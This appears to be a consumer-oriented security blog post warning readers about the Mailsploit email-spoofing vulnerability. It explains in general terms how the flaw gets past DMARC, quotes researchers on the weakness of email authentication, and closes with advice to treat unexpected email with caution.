In phishing, emails are the bait and you are the dinner. Mailsploit is a new way for phishers to become unstoppable if this vulnerability isn’t patched soon. Read this article to help you stay safe!
Phishing is a big deal. How big? Well, it’s the most common form of cyber attack by far, with more than a billion phishing attempts every day. The basic phishing scheme is an email that attempts to be something it isn’t, like an email from Amazon saying you need to verify your information, or a Middle-Eastern Prince wanting to send you $10,000 dollars.
In order to not fall prey to phishing schemes you’ve got to keep a sharp eye, and always keep your guard up! Don’t trust any email you’re not expecting, and don’t open any attachment you’re not waiting for. But what happens when you get an email from your boss? Can you trust it?
It’s a hard question to answer, and it just got harder. Security researchers just found out a way to perfectly spoof an email address, meaning that you could receive an email from firstname.lastname@example.org (actual email address for the President), from someone totally random and malicious, and President Trump would never know.
The hack is being called Mailsploit, and it is about to pwn a lot of inboxes. So much so that the researcher who found it, Sabri Haddouche, said Mailsploit “makes these spoofed emails virtually unstoppable at this point in time.”
How Does it Work?
Usually, email servers are pretty good at figuring out who’s who. The newest tech is called Domain-based Message Authentication, Reporting, and Conformance (DMARC). What it does is block spoofed emails by filtering out the ones that came from a different source. Today, phishers try to use fake domains to try and fool the end user. If you’re careful, you can always spot that.
Mailsploit, on the other hand, can beat DMARC and actually use legitimate domains. It doesn’t hack the mail account, instead, it just tricks email servers into thinking the mail comes from another source than it actually does. Dan Kaminsky, a security researcher from WhiteOps said, “The cleverness of this attack is that everything comes from the right source from the perspective of the mail server, but at the moment it’s displayed to the user it comes from someone else.”
Are We in Trouble?
e going to start seeing emails from President Trump appointing us to be the next ambassador for Libya? How can we be sure that any email is correct or not? Thankfully, Haddouche, the researcher who found the exploit, has notified all the affected firms “months ago” and most say they are working on a fix. Whether patches have been released or not is the question.
The real problem is that email authentication isn’t where it needs to be. Security features like DMARC are made to prevent spam, not targeted phishing. “This all part of the goop of email being a ’90s protocol before security was a big deal,” Kaminsky says. “The system that accidentally prevents you from pretending to be the president of the US is good enough for spam protection, but it’s not good enough for phishing protection.”
The takeaway from this article: Be wary of email. It’s a useful tool, but you can’t believe everything you read. Check out this other article for more information about phishing, and stay safe out there!